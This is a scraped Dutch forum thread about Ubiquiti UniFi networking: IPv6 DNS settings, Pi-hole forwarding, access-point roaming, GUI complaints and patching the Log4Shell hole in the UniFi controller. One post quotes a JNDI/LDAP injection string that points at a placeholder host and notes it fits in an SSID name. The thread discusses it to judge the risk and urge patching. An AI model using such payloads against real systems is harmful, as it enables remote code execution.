:strip_exif()/i/2006357726.webp?f=thumbmini)
:strip_exif()/i/2006834108.webp?f=thumbmini)
:strip_exif()/i/2000734477.png?f=thumbmini)
:strip_exif()/i/2000734471.png?f=thumbmini)
:strip_exif()/i/2000734468.png?f=thumbmini)
:strip_exif()/i/2001999503.png?f=thumbmini)
:strip_exif()/i/2001306247.png?f=thumbmini)
:strip_exif()/i/2001928129.png?f=thumbmini)
:fill(white):strip_exif()/i/2001337171.jpeg?f=thumbmini)
:strip_exif()/i/2003239134.png?f=thumbmini)
:fill(white):strip_exif()/i/2002914372.jpeg?f=thumbmini)
:strip_exif()/i/2002396556.png?f=thumbmini)
:strip_exif()/i/2001363373.png?f=thumbmini)
:fill(white):strip_exif()/i/2001352419.jpeg?f=thumbmini)
:fill(white):strip_exif()/i/2006727466.jpeg?f=thumbmini)
:strip_exif()/i/2001382445.png?f=thumbmini)
:strip_exif()/i/2001476135.png?f=thumbmini)
:fill(white):strip_exif()/i/2001089077.jpeg?f=thumbmini)
:fill(white):strip_exif()/i/2001130391.jpeg?f=thumbmini)
:strip_exif()/i/2004023914.png?f=thumbmini)
:strip_exif()/i/2004042420.png?f=thumbmini)
:strip_exif()/i/2004342420.webp?f=thumbmini)
:strip_exif()/i/2005671450.webp?f=thumbmini)
:strip_exif()/i/2001557197.png?f=thumbmini)
:fill(white):strip_exif()/i/2000847208.jpeg?f=thumbmini)
:strip_exif()/i/2002194281.png?f=thumbmini)
:strip_exif()/i/2003247502.png?f=thumbmini)
:fill(white):strip_exif()/i/2005714546.jpeg?f=thumbmini)
:strip_exif()/i/2007105758.png?f=thumbmini)
:strip_exif()/i/2006607526.webp?f=thumbmini)
:strip_exif()/i/2003409930.png?f=thumbmini)
:strip_exif()/i/2002211835.png?f=thumbmini)
:strip_exif()/i/2006263918.png?f=thumbmini)
:fill(white):strip_exif()/i/2003731346.jpeg?f=thumbmini)
:strip_exif()/i/2003240650.png?f=thumbmini)
:strip_exif()/i/2003811210.png?f=thumbmini)
:strip_exif()/i/2003781352.png?f=thumbmini)
:strip_exif()/i/2003681596.png?f=thumbmini)
:strip_exif()/i/2005129762.webp?f=thumbmini)
:strip_exif()/i/2005927728.png?f=thumbmini)
:strip_exif()/i/2006733988.webp?f=thumbmini)
:strip_exif()/i/2003780500.png?f=thumbmini)
:strip_icc():strip_exif()/u/80660/crop5f6211e92ac13_cropped.jpeg?f=community)
Nope
:strip_icc():strip_exif()/u/126727/roybatty.jpg?f=community)
:strip_exif()/u/290839/crop5b757283a589c_cropped.gif?f=community)
IPv6 vraagje 
Ik heb in mijn UDM-Pro opgegeven onder IPv6 dat deze 2001:4860:4860::8888 en 2001:4860:4860::8844 moet gebruiken bij een DHCP lease richting de client. Nu is het zo dat ik wel een IPv6 adres krijg van Unifi maar mijn Ipv6 adres van de UDM-Pro als DNS server zie staan
Hebben meer mensen dit? en iemand een tip hoe dit te verhelpen?
Ik heb in mijn UDM-Pro opgegeven onder IPv6 dat deze 2001:4860:4860::8888 en 2001:4860:4860::8844 moet gebruiken bij een DHCP lease richting de client. Nu is het zo dat ik wel een IPv6 adres krijg van Unifi maar mijn Ipv6 adres van de UDM-Pro als DNS server zie staan
Hebben meer mensen dit? en iemand een tip hoe dit te verhelpen?
Cloud ☁️
:strip_icc():strip_exif()/u/12156/crop5e00838980023_cropped.jpeg?f=community)
Ook dns aanpassen in je dhcpv6:
IPv6 vraagje
Ik heb in mijn UDM-Pro opgegeven onder IPv6 dat deze 2001:4860:4860::8888 en 2001:4860:4860::8844 moet gebruiken bij een DHCP lease richting de client. Nu is het zo dat ik wel een IPv6 adres krijg van Unifi maar mijn Ipv6 adres van de UDM-Pro als DNS server zie staan
Hebben meer mensen dit? en iemand een tip hoe dit te verhelpen?
:fill(white):strip_exif()/f/image/xtNa7lkdrzLkkwhpz237C26c.png?f=user_large)
[ Voor 25% gewijzigd door Tylen op 10-12-2021 16:36 ]
“Choose a job you love, and you will never have to work a day in your life.”
Wat wil je dan precies? Zet daar je juiste dnsv6 server neer die je wilt gebruiken. En dan ipconfig /renew6
“Choose a job you love, and you will never have to work a day in your life.”
Ja en dat werkt dus niet:
[...]
Wat wil je dan precies? Zet daar je juiste dnsv6 server neer die je wilt gebruiken. En dan ipconfig /renew6
ik blijf mijn UDM ipv6 als dns krijgen.
Cloud ☁️
Ah ok. Nee hier werkt het wel goed.:
[...]
Ja en dat werkt dus niet
“Choose a job you love, and you will never have to work a day in your life.”
:strip_icc():strip_exif()/u/198189/crop67ecf5f08705a_cropped.jpg?f=community)
:strip_icc():strip_exif()/u/33065/crop59d32fcf38790_cropped.jpeg?f=community)
ja wilde ik ook, tot mijn prefix wijzigde en de PiHole wel een nieuw adres kreeg maar de vast ingestelde DNS server niet gewijzigd werd (natuurlijk niet)...:
[...]
Daar is niks mis mee
Dan maar enkel DNS via IPv4 (er komen toch wel IPv6 adressen terug)...
[ Voor 9% gewijzigd door darkrain op 10-12-2021 18:27 ]
Na moet iets rots zijn in mijn bestaande wifi netwerk profile. Zo juist een nieuw netwerk aangemaakt en daar gaat het wel goed
Heb nu een IPv6 only wifi netwerk gemaakt haha
:no_upscale():strip_icc():fill(white):strip_exif()/f/image/r3tH7NAV2UwBUmGRhcm48fxD.jpg?f=user_large)
Cloud ☁️
Apart. Ik draai gewoon mixxed mode zonder issues met custom dns servers. (Load balancers op de Citrix ADC):
[...]
Na moet iets rots zijn in mijn bestaande wifi netwerk profile. Zo juist een nieuw netwerk aangemaakt en daar gaat het wel goed
Heb nu een IPv6 only wifi netwerk gemaakt haha
[Afbeelding]
:fill(white):strip_exif()/f/image/YHh9FBkWmiGnTZAjtR0wNzM7.png?f=user_large)
“Choose a job you love, and you will never have to work a day in your life.”
ph34r my [WCG] Cows :P
- Netwerk switches
- Ubiquiti Unifi Dream Machine Special Edition
- Ubiquiti UniFi Dream Machine SE
- Ubiquiti UniFi
- Unifi
- Amplifi
- Accesspoints
- Ubiquiti UniFi AC HD
- Ubiquiti EdgeRouter Lite 3-Poort Router
- Ubiquiti EdgeRouter X
- Ubiquiti UniFi AC In-Wall
- Ubiquiti UniFi AC In-Wall Pro
- Amplifi High Density WiFi Router
- Ubiquiti EdgePoint Router
- Ubiquiti EdgeRouter Infinity
- Netwerkaccessoires
- Ubiquiti
- Amplifi High Density WiFi System (2 mesh points)
- Netwerkapparatuur
- Modems en routers
:strip_exif()/u/49248/DPCkoeienUD.gif?f=community)
Zag ook net de e-mail daarvan en heel eerlijk gezegd denk ik dat het vooral belangrijk is voor de gebruikers van een Guest WiFi Portal die vanaf de UniFi Controller wordt geserveerd
Zie ook : https://community.ui.com/...aa-42ce-9580-c0a7d91c4b89
En : https://www.lunasec.io/docs/blog/log4j-zero-day/
* nero355 heeft stiekem helemaal geen zin in de nieuwe GUI en nieuwere UniFi Controller versies dan 5.14.23 dus elk excuus om het niet te doen is er weer één!
/EDIT :
Als dat een dingetje wordt in de toekomst dan heb ik liever geen IPv6
Maar misschien ben ik teveel verwend door KPN in het verleden die gewoon zei :
En KLAAR!!!
Ondertussen zag ik al die Chello/UPC/Ziggo klanten constant klooien met een ander adres om de zoveel tijd! LOL!
Misschien als workaround dan maar de Link-Local adressen voor zulke dingen gebruikenen de PiHole wel een nieuw adres kreeg maar de vast ingestelde DNS server niet gewijzigd werd (natuurlijk niet)...
Dan maar enkel DNS via IPv4 (er komen toch wel IPv6 adressen terug)...
[ Voor 32% gewijzigd door nero355 op 11-12-2021 00:46 ]
|| Stem op mooiere Topic Search linkjes! :) " || Pi-Hole : Geen advertenties meer voor je hele netwerk! >:) ||
- Unifi
- Ubiquiti UniFi
- Ubiquiti
- Amplifi
- Netwerkaccessoires
- Netwerkapparatuur
- Ubiquiti UniFi AC HD
- Ubiquiti EdgeRouter Lite 3-Poort Router
- Ubiquiti EdgeRouter X
- Ubiquiti UniFi AC In-Wall
- Ubiquiti EdgeRouter Infinity
- Ubiquiti UniFi AC In-Wall Pro
- Amplifi High Density WiFi Router
- Ubiquiti EdgePoint Router
- Ubiquiti UniFi nanoHD
- Netwerk switches
- Amplifi High Density WiFi System (2 mesh points)
- Ubiquiti Cloud Gateway Max
- Modems en routers
- Accesspoints
- Ubiquiti UniFi AP-AC LITE
- Ubiquiti UniFi AP AC PRO
Wat ik mij zo kan herinneren van Essent@home => @home => Ziggo is dat het IP adres zeeeer zelden wijzigd, zolang je geen andere router aansluit. Toevallig dat het begin dit jaar of vorig jaar "spontaan" is veranderd (van 84.... naar 217....) maar denk dat ik verder misschien al 10 jaar hetzelfde had / dat alleen wijzigde bij het plaatsen van een nieuwe router. Een router die ik jaren niet gebruikt had heb ik zelfs nog eens een keer ergens anders aangesloten en die kreeg zelfs toen weer hetzelfde IP adres als wat die bij mij had. Dat bij Ziggo het IP adres continu verandere valt dus wel mee in mijn ervaring.:
Ondertussen zag ik al die Chello/UPC/Ziggo klanten constant klooien met een ander adres om de zoveel tijd! LOL!
@nero355 Hoe vaak gebruik je de GUI dan dat je er zo’n haat voor hebt? Het enige dat ik in de GUI doe is soms een IP-/MAC-adres opzoeken, maar ik ga niet voor mijn plezier minuten lang naar de topologie of grafiekjes kijken? ‘Alles’ (beperkingen van Ubiquiti daargelaten) zit toch inmiddels in v6?
Vwb je IPv6 prefix opmerking: Bij Mikrotik kun je ook een zogeheten prefix-hint meegeven waardoor mijn adres tot dusver altijd hetzelfde is gebleven
Vwb je IPv6 prefix opmerking: Bij Mikrotik kun je ook een zogeheten prefix-hint meegeven waardoor mijn adres tot dusver altijd hetzelfde is gebleven
:strip_icc():strip_exif()/u/340735/crop6448f8f93e3de.jpg?f=community)
Een prefix hint is alleen maar om de onderhandeling voor de lengte van het prefix goed te laten verlopen. De DUID van je dhcp client is in dat geval een stuk belangrijker.:
@nero355 Hoe vaak gebruik je de GUI dan dat je er zo’n haat voor hebt? Het enige dat ik in de GUI doe is soms een IP-/MAC-adres opzoeken, maar ik ga niet voor mijn plezier minuten lang naar de topologie of grafiekjes kijken? ‘Alles’ (beperkingen van Ubiquiti daargelaten) zit toch inmiddels in v6?
Vwb je IPv6 prefix opmerking: Bij Mikrotik kun je ook een zogeheten prefix-hint meegeven waardoor mijn adres tot dusver altijd hetzelfde is gebleven
Overigens heb ik bij Ziggo ook al 7 jaar hetzelfde IP. Vooral door het gebruik van hetzelfde WAN MAC.
[ Voor 6% gewijzigd door ed1703 op 11-12-2021 09:09 ]
Ach zo vaak verandert die prefix nou ook weer niet:
Ondertussen zag ik al die Chello/UPC/Ziggo klanten constant klooien met een ander adres om de zoveel tijd! LOL!
[...]
Misschien als workaround dan maar de Link-Local adressen voor zulke dingen gebruiken
Link-Local werkt bij mij niet (niet ingedoken waarom niet)... Maar goed enkel via IPv4 naar PiHole heeft ook als voordeel dat je dashboard niet vol komt te staan met IPv6 adressen die je niet kan terugbrengen naar clients (komt door privacy extensions)...
Link-Local adressen zijn ook exact dat, local. Als je om wat voor reden dan ook een intern ipv6 subnet wilt gebruiken moet je een fc00::/7 gebruiken, wat in de praktijk altijd een fd00::/8 wordt. Die worden enkel intern gerouteerd en zijn daarmee niet van buitenaf beinvloedbaar:
[...]
Ach zo vaak verandert die prefix nou ook weer niet
Link-Local werkt bij mij niet (niet ingedoken waarom niet)... Maar goed enkel via IPv4 naar PiHole heeft ook als voordeel dat je dashboard niet vol komt te staan met IPv6 adressen die je niet kan terugbrengen naar clients (komt door privacy extensions)...
Kende jullie de tip al om de displays van de switches uit te schakelen? Dit is een per device instelling, je zet de night time op 23uren en 59minuten.
:fill(white):strip_exif()/f/image/NnbgQn9VwXfUhZBKlXIsOyVI.png?f=user_large)
:fill(white):strip_exif()/f/image/ngNuZ4Go7Re2yB4ERI00umqH.png?f=user_large)
:strip_icc():strip_exif()/u/369001/crop574d49524e04a_cropped.jpeg?f=community)
Je zou zeggen dat de controller bepaald welke cliënt op welk AP wordt aangesloten.
Client op drie meter in line of sight van AP, blijft heel stug verbinden met een AP die veel verder ligt en achter twee muren. En dan de melding erbij dat het geen optimale verbinding is....
Reconnect etc blijft stug terugkoppelen naar het AP dat ik niet wil hebben.
Tot zover de reden om er een controller achter te hangen
Standaard instellingen overigens, geen rare fratsen uitgehaald.
Client op drie meter in line of sight van AP, blijft heel stug verbinden met een AP die veel verder ligt en achter twee muren. En dan de melding erbij dat het geen optimale verbinding is....
Reconnect etc blijft stug terugkoppelen naar het AP dat ik niet wil hebben.
Tot zover de reden om er een controller achter te hangen
Standaard instellingen overigens, geen rare fratsen uitgehaald.
Waiting on the world to change
Er zijn echt wel meer manieren om dit te exploiteren. Elk pad waarbij je een bericht in de controller forceert ('duplicate BSSID gezien') kan dit potentieel veroorzaken.:
[...]
Zag ook net de e-mail daarvan en heel eerlijk gezegd denk ik dat het vooral belangrijk is voor de gebruikers van een Guest WiFi Portal die vanaf de UniFi Controller wordt geserveerd
Zie ook : https://community.ui.com/...aa-42ce-9580-c0a7d91c4b89
En : https://www.lunasec.io/docs/blog/log4j-zero-day/
En ${jndi:ldap://host.io/a} past in een SSID naam
ph34r my [WCG] Cows :P
- Netwerk switches
- Ubiquiti Unifi Dream Machine Special Edition
- Ubiquiti UniFi Dream Machine SE
- Ubiquiti UniFi
- Unifi
- Amplifi
- Accesspoints
- Ubiquiti UniFi AC HD
- Ubiquiti EdgeRouter Lite 3-Poort Router
- Ubiquiti EdgeRouter X
- Ubiquiti UniFi AC In-Wall
- Ubiquiti UniFi AC In-Wall Pro
- Amplifi High Density WiFi Router
- Ubiquiti EdgePoint Router
- Ubiquiti EdgeRouter Infinity
- Netwerkaccessoires
- Ubiquiti
- Amplifi High Density WiFi System (2 mesh points)
- Netwerkapparatuur
- Modems en routers
Daar gaat het niet om
Ik vind het gewoon een domme onnodige redesign en ik ben daar echt niet de enige in!
Een hoop dingen krijgen een andere plek en je zoekt je rot naar instellingen die in het verleden veel makkelijker te vinden waren...
Om over het switchen tussen de nieuwe en oude GUI voor sommige instellingen maar niet te beginnen!
Dat doe ik dan ook niet, maar er is ook zoiets als een voorkeur hebben qua tools/GUI's waarmee je werkt hé!
Volgens mij was er laatst nog het een ander meerdere keren erbij gekomen om vervolgens weer permanent te verdwijnen!
Prefix Length != SubnetVwb je IPv6 prefix opmerking: Bij Mikrotik kun je ook een zogeheten prefix-hint meegeven waardoor mijn adres tot dusver altijd hetzelfde is gebleven
Laten we het hopen...:
Ach zo vaak verandert die prefix nou ook weer niet
Dat lijkt me best wel raar en is zeker iets om effe goed uit te zoeken!
Zulke Clients zou ik gewoon van mijn netwerk weren!
Was al bekend, maar volgens mij niet bekend genoeg dus wel een mooie tip!
Hmm... crap... daar zeg je wat!:
Er zijn echt wel meer manieren om dit te exploiteren. Elk pad waarbij je een bericht in de controller forceert ('duplicate BSSID gezien') kan dit potentieel veroorzaken.
En ${jndi:ldap://host.io/a} past in een SSID naam
Alleen hele dure Cisco/HPE/enz. modellen
Client op drie meter in line of sight van AP, blijft heel stug verbinden met een AP die veel verder ligt en achter twee muren. En dan de melding erbij dat het geen optimale verbinding is....
Reconnect etc blijft stug terugkoppelen naar het AP dat ik niet wil hebben.
Tot zover de reden om er een controller achter te hangen
Standaard instellingen overigens, geen rare fratsen uitgehaald.
Begin eens met :
2.4 GHz @ Low
5 GHz @ High
"And take it from there..."
- Heb je de optie om een BSSID op te geven ??
- Waarom is dat gekke ding eigenlijk niet gewoon via UTP aangesloten
|| Stem op mooiere Topic Search linkjes! :) " || Pi-Hole : Geen advertenties meer voor je hele netwerk! >:) ||
:strip_exif()/u/140467/crop67b0d64186309.gif?f=community)
In recente versies van de controller is er de mogelijkheid een client aan een bepaald AP "vast te knopen".
Ik maak daar dankbaar gebruik van om o.a. een Nest-hub en een printer aan één van mijn AP's te hangen.
In de client list, de gewenste client selecteren, en via Settings instellen.
:no_upscale():strip_icc():fill(white):strip_exif()/f/image/1pCZ1gKq3rTt95Mbg9BgsCBe.jpg?f=user_large)
[ Voor 6% gewijzigd door Masimo op 11-12-2021 20:02 ]
Dagelijks meerdere keren per dag. Even wat wijzigen of de firewall corrigeren/ inrichten vanwege een wijziging bij klanten is zo frustrerend wie bedenkt het om bij opslaan van regels niet gewoon naar de firewall regeloverzicht terug te gaan maar naar het voor liggen tab blad. Dagelijks regel maken is ramp. Daarbij is het bij het maken van deze regel steeds weer goed kijken of het juiste uitschuifvelt open hebt staan en zoek naar functie die niet zichtbaar zijn omdat ze onlogisch in een ander openklap menu zitten:
@nero355 Hoe vaak gebruik je de GUI dan dat je er zo’n haat voor hebt? Het enige dat ik in de GUI doe is soms een IP-/MAC-adres opzoeken, maar ik ga niet voor mijn plezier minuten lang naar de topologie of grafiekjes kijken? ‘Alles’ (beperkingen van Ubiquiti daargelaten) zit toch inmiddels in v6?
Vwb je IPv6 prefix opmerking: Bij Mikrotik kun je ook een zogeheten prefix-hint meegeven waardoor mijn adres tot dusver altijd hetzelfde is gebleven
Momenteel is het waardeloos. Een van de redenen waarom ik mensen die (web/software) designe steeds is minder mag is om de meeste designers stuk gaan openvouwen schermpjes en het creëren van niet noodzakelijke handelingen waarvan ze denken dan past het mooi in een scherm dat voorkomt scrollen
[ Voor 13% gewijzigd door xbeam op 11-12-2021 21:52 ]
Lesdictische is mijn hash#
Dat aanpassen van de firewall regels is eigenlijk wel mijn grootste ergernis aan die hele nieuwe GUI:
[...]
Dagelijks meerdere keren per dag. Even wat wijzigen en de firewall corrigeren/ inrichten vanwege een wijziging is zo frustrerend wie benut het om bij opslaan van regel niet gewoon naar de firewall regels te gaan maar het voor liggen tab blad dagelijks regel maken is ramp. Daarbij is maken van deze regel steeds weer goed kijken of het juiste uitschuifvelt open staat anders zoek naar functie die niet zichtbaar zijn omdat onlogisch in open klap menu zitten
Momenteel is het waardeloos. Een van de redenen waarom technische mensen en (web/software) designers niet samen gaan is om dat de meeste designers stuk gaan openvouwen schermpje om en creëren van niet noodzakelijke handelingen de denken dan pst het mooi in scherm want scrollen is lastig
Het overzicht is echt totaal zoek
Cloud ☁️
@xbeam Als je dagelijks zaken in de firewall aanpast kan ik je een device aanbevelen dat geen provision hoeft te doen, maar waarbij de wijziging gewoon instant is. Wat een verademing
Nu versnel ik het actief worden van de regels door er standaard een snippit achter aan te gooien.:
@xbeam Als je dagelijks zaken in de firewall aanpast kan ik je een device aanbevelen dat geen provision hoeft te doen, maar waarbij de wijziging gewoon instant is. Wat een verademing
code:
1
| clear connection-trackin |
[ Voor 9% gewijzigd door xbeam op 11-12-2021 21:47 ]
Lesdictische is mijn hash#
Had ik gedaan met de tv in de woonkamer. Lock to AP..... Nee hoor, de grote Sony Bravia wil graag met een ander AP verbinden en doet dat dan stug ook.
Het andere apparaat welke niet wilde verbinden is een Ziggo Next decoder. Daar doe ik maar geen uitspraken over verder
Instellingen doe ik nu remote, want niet bij mij thuis.
Waiting on the world to change
:strip_icc():strip_exif()/u/1016389/crop5e0a49489406b_cropped.jpeg?f=community)
Geef je na dat soort wijzigingen de betreffende devices ook wel een reconnect in de controlller?:
[...]
Had ik gedaan met de tv in de woonkamer. Lock to AP..... Nee hoor, de grote Sony Bravia wil graag met een ander AP verbinden en doet dat dan stug ook.
Het andere apparaat welke niet wilde verbinden is een Ziggo Next decoder. Daar doe ik maar geen uitspraken over verder
Instellingen doe ik nu remote, want niet bij mij thuis.
Soms hebben ze net even dat duwtje nog nodig.
[ Voor 0% gewijzigd door Behoorlijk Leek op 11-12-2021 22:56 . Reden: typo ]
:strip_icc():strip_exif()/u/484156/4421153_1_sma.jpg?f=community)
:strip_icc():strip_exif()/u/56758/falconlogo.jpg?f=community)
Blijkbaar is de Unifi Network Application vatbaar voor het log4shell security lek.
Versie 6.5.54 zou deze vulnerabilitie patchen.
Dus tenzij je cryptominers of ransomware naar je systemen wil doorkrijgen : best patchen ( en vingers kruisen in de hoop dat je systeem na de patch nog goed werkt ! )
*edit * Op het eerste zicht nog niet echt problemen met de versie update : https://community.ui.com/...bb-4979-8b10-99db36ddabe1
Versie 6.5.54 zou deze vulnerabilitie patchen.
Dus tenzij je cryptominers of ransomware naar je systemen wil doorkrijgen : best patchen ( en vingers kruisen in de hoop dat je systeem na de patch nog goed werkt !
)*edit * Op het eerste zicht nog niet echt problemen met de versie update : https://community.ui.com/...bb-4979-8b10-99db36ddabe1
[ Voor 23% gewijzigd door Falcon10 op 13-12-2021 08:36 ]
-| Hit it i would ! |-
:strip_icc():strip_exif()/u/17358/Bahco.jpg?f=community)
Hoe realistisch is jouw scenario voor de huis, tuin en keukengebruikers als je je controller alleen lokaal draait en dus zonder remote toegang?:
Blijkbaar is de Unifi Network Application vatbaar voor het log4shell security lek.
Versie 6.5.54 zou deze vulnerabilitie patchen.
Dus tenzij je cryptominers of ransomware naar je systemen wil doorkrijgen : best patchen ( en vingers kruisen in de hoop dat je systeem na de patch nog goed werkt !
*edit * Op het eerste zicht nog niet echt problemen met de versie update : https://community.ui.com/...bb-4979-8b10-99db36ddabe1
:strip_icc():strip_exif()/u/99951/Eye.jpg?f=community)
Optie 2 is de makkelijkste maar gaat wel verloren bij een update van de firmware was mijn ervaring toen
Cloud ☁️
/u/363743/crop61aa1329d36b8_cropped.png?f=community)
Ja, dat heb ik ook gelezen, maar dat zou je weer kunnen ondervangen met een config.gateway.json, als ik het goed begrepen heb:
[...]
Optie 2 is de makkelijkste maar gaat wel verloren bij een update van de firmware was mijn ervaring toen
Ja, dat klopt ook, maar dat doet niks met de hostname resolutie.
Wilde net een edit toevoegen met dat ik de vraag niet helemaal goed gelezen had:
[...]
Ja, dat heb ik ook gelezen, maar dat zou je weer kunnen ondervangen met een config.gateway.json, als ik het goed begrepen heb
[...]
Ja, dat klopt ook, maar dat doet niks met de hostname resolutie.
Maar als je de PiHole als DNS server gebruikt, kun je Conditional Forwarding gebruiken voor je lokale netwerk. Daarmee zorg je ervoor dat je router de DNS lookups geforwarded krijgt vanuit de pihole voor de lokale apparaten.
Ja, dat heb ik ook :-):
[...]
Wilde net een edit toevoegen met dat ik de vraag niet helemaal goed gelezen had
Maar als je de PiHole als DNS server gebruikt, kun je Conditional Forwarding gebruiken voor je lokale netwerk. Daarmee zorg je ervoor dat je router de DNS lookups geforwarded krijgt vanuit de pihole voor de lokale apparaten.
[...]
Maar waar bij OpenWRT het registreren van een vast DHCP adres ook gelijk er voor zorgde dat de DNS goed werkte, is dat bij de USG niet zo, vandaar de vraag
Ik heb dezelfde set-up met PiHole en lokale dns entries via de DHCP van de router, dus dat zou wel moeten werken. Zie je ook geen hostnamen in de pi-hole logs van de apparaten die een lookup doen?:
[...]
Ja, dat heb ik ook :-)
Maar waar bij OpenWRT het registreren van een vast DHCP adres ook gelijk er voor zorgde dat de DNS goed werkte, is dat bij de USG niet zo, vandaar de vraag
Ik heb wel een lokaal domein ingesteld op m'n netwerk ([domein].local) dus het zou kunnen dat het daaraan ligt. Heb je al een lookup geprobeerd met .local erachter, of door in het netwerk via de controller een domain name in te stellen?
Dit had ik, maar ik heb het weer uitgezet. Er kwamen meldingen dat het ip van de UDM tijdelijk werd begrensd omdat er teveel requests kwamen.:
[...]
Wilde net een edit toevoegen met dat ik de vraag niet helemaal goed gelezen had
Maar als je de PiHole als DNS server gebruikt, kun je Conditional Forwarding gebruiken voor je lokale netwerk. Daarmee zorg je ervoor dat je router de DNS lookups geforwarded krijgt vanuit de pihole voor de lokale apparaten.
[...]
Het leek op een soort loop. Ik ben er niet verder ingedoken.
Misschien hebben jullie een tip.
Be small, act BIG.
Inderdaad iets gemist
Er staat onderin de uitleg van Conditional Forwarding de volgende regel, wat in dit geval misschien van belang is:
Hoewel het insinueert dat het dat ook doet als het wel enabled is, kan dat wel het verschil maken. Vooral gelet op de uitleg bij de twee opties:
Door wie werd het IP begrensd en wat gaf de melding?
[ Voor 27% gewijzigd door mrdemc op 13-12-2021 12:32 ]
Dan heb je inderdaad een loop gemaakt
Je hebt dan waarschijnlijk de DNS van de WAN naar de Pi Hole gezet, maar eigenlijk zou je de DNS van de LAN (dhcp-option) op de PiHole moeten zetten en de DNS van de WAN op dezelfde WAN DNS waar de Pi Hole op staat. Dan gaan de apparaten op je netwerk rechtstreeks naar de pi-hole met de DNS verzoeken en alles wat niet door de pihole kan worden opgepakt gaat naar de WAN DNS, behalve de lokale hosts, die gaan via de router. Als de router dan zelf een dns request doet, zal deze ook weer via de WAN DNS gaan, maar dat is in principe geen probleem, die zal alleen verzoeken doen als dat nodig is vanuit de router intern (dus bijv. voor de controller hostnaam, ophalen van gegevens bij unifi, etc.).
Ja, maar als ik die opties disable krijg ik de volgende zaken in het log::
[...]
Inderdaad iets gemist
Er staat onderin de uitleg van Conditional Forwarding de volgende regel, wat in dit geval misschien van belang is:
[...]
Hoewel het insinueert dat het dat ook doet als het wel enabled is, kan dat wel het verschil maken. Vooral gelet op de uitleg bij de twee opties:
[...]
107.2.168.192.in-addr.arpa
en dat hoort volgens mij ook niet.
Heb nu ff beide PiHoles restart (en een paar docker containers), maar het lijkt nog geen verschil te maken.
ph34r my [WCG] Cows :P
- Netwerk switches
- Ubiquiti Unifi Dream Machine Special Edition
- Ubiquiti UniFi Dream Machine SE
- Ubiquiti UniFi
- Unifi
- Amplifi
- Accesspoints
- Ubiquiti UniFi AC HD
- Ubiquiti EdgeRouter Lite 3-Poort Router
- Ubiquiti EdgeRouter X
- Ubiquiti UniFi AC In-Wall
- Ubiquiti UniFi AC In-Wall Pro
- Amplifi High Density WiFi Router
- Ubiquiti EdgePoint Router
- Ubiquiti EdgeRouter Infinity
- Netwerkaccessoires
- Ubiquiti
- Amplifi High Density WiFi System (2 mesh points)
- Netwerkapparatuur
- Modems en routers
Mijn TIP zal voor altijd blijven :
- Static DHCP IP Mappings op basis van het MAC adres in de UniFi Controller.
- Local DNS Records in Pi-Hole voor elk van die IP adressen.
Kan tegenwoordig ook via de webGUI van Pi-Hole zelfs dus je hebt geen enkel excuus meer om het niet te doen!
:
Blijkbaar is de Unifi Network Application vatbaar voor het log4shell security lek.
Versie 6.5.54 zou deze vulnerabilitie patchen.
Dus tenzij je cryptominers of ransomware naar je systemen wil doorkrijgen : best patchen ( en vingers kruisen in de hoop dat je systeem na de patch nog goed werkt !
*edit * Op het eerste zicht nog niet echt problemen met de versie update : https://community.ui.com/...bb-4979-8b10-99db36ddabe1
Is al besproken ondertussen dus lees dit eens : ANdrode in "[Ubiquiti-Netwerkapparatuur] Ervaringen & Discussie - Deel 4"
En alle andere reacties die erbij horen
|| Stem op mooiere Topic Search linkjes! :) " || Pi-Hole : Geen advertenties meer voor je hele netwerk! >:) ||
Die post heb ik even gemist:
[...]
[...]
Mijn TIP zal voor altijd blijven :
- Static DHCP IP Mappings op basis van het MAC adres in de UniFi Controller.
- Local DNS Records in Pi-Hole voor elk van die IP adressen.
Kan tegenwoordig ook via de webGUI van Pi-Hole zelfs dus je hebt geen enkel excuus meer om het niet te doen!
[...]
[...]
Is al besproken ondertussen dus lees dit eens : ANdrode in "[Ubiquiti-Netwerkapparatuur] Ervaringen & Discussie - Deel 4"
En alle andere reacties die erbij horen
Ik tel mijn zegeningen wel totdat ik zeker weet dat ik pijnloos kan upgraden. Track record van UI is niet bepaald vlekkeloos gebleken is mijn eigen ervaring.
Het scenario waarin ik getroffen kan worden acht ik te klein vs de down time en daaropvolgende toorn van mijn gezin.
Zolang je de controller lokaal draait is er weinig directe dreiging. Maar als je hem via internet laat draaien op een andere locatie (handig bij een multi-site setup) dan is het verstandig direct te patchen of de workaround te gebruiken.:
[...]
Die post heb ik even gemist
Ik tel mijn zegeningen wel totdat ik zeker weet dat ik pijnloos kan upgraden. Track record van UI is niet bepaald vlekkeloos gebleken is mijn eigen ervaring.
Het scenario waarin ik getroffen kan worden acht ik te klein vs de down time en daaropvolgende toorn van mijn gezin.
Zie hieronder:
Daarmee kun je dus in feite een script plaatsen die om de zoveel tijd een c&c server benaderd om opdrachten op te ontvangen en data te versturen, daarvoor heb je geen directe toegang tot de controller nodig als aanvaller, dus wat je zegt is niet waar:
[...]
Er zijn echt wel meer manieren om dit te exploiteren. Elk pad waarbij je een bericht in de controller forceert ('duplicate BSSID gezien') kan dit potentieel veroorzaken.
En ${jndi:ldap://host.io/a} past in een SSID naam
Wat wel waar is, is dat je je eigen afweging moet maken natuurlijk, maar dan wel op basis van juiste informatie.
[ Voor 3% gewijzigd door mrdemc op 13-12-2021 18:19 ]
/u/189557/crop5817118eac8cf.png?f=community)
Eentje en nee:
[...]
Jij hebt unifi controllers direct aan het internet hangen en opvraagbaar voor iedereen?
Via ios 15.2 haal ik naar boven dat mijn unifi app onderstaande domeinen aanspreekt. Iemand een idee welke de eerste en de vijfde doen?
/f/image/vCqbxH3E1Lb3cVLITiwbv3yx.png?f=fotoalbum_large)
:fill(white):strip_exif()/f/image/vCqbxH3E1Lb3cVLITiwbv3yx.png?f=user_large)
Cloud ☁️
Creatieve keuze! Dat is geen geldige hostnaam denk ik dus deze gaat niet op denk ik
Ik zou er vanuit gaan dat er een pad is dat een aanvaller kan gebruiken om de controller over te nemen. De proof of concept is niet nodig als het risico aannemelijk is?
/u/820/crop5dc1821dada95_cropped.png?f=community)
8.960 Wp - 16 kW Daikin L/W - 2 x MHI L/L - gasloos sinds 2017 - Loxone - SAP/IS-U/ABAP - rijdt nog LPG ;-)
:strip_icc():strip_exif()/u/122857/Ed.jpg?f=community)
ph34r my [WCG] Cows :P
- Netwerk switches
- Ubiquiti Unifi Dream Machine Special Edition
- Ubiquiti UniFi Dream Machine SE
- Ubiquiti UniFi
- Unifi
- Amplifi
- Accesspoints
- Ubiquiti UniFi AC HD
- Ubiquiti EdgeRouter Lite 3-Poort Router
- Ubiquiti EdgeRouter X
- Ubiquiti UniFi AC In-Wall
- Ubiquiti UniFi AC In-Wall Pro
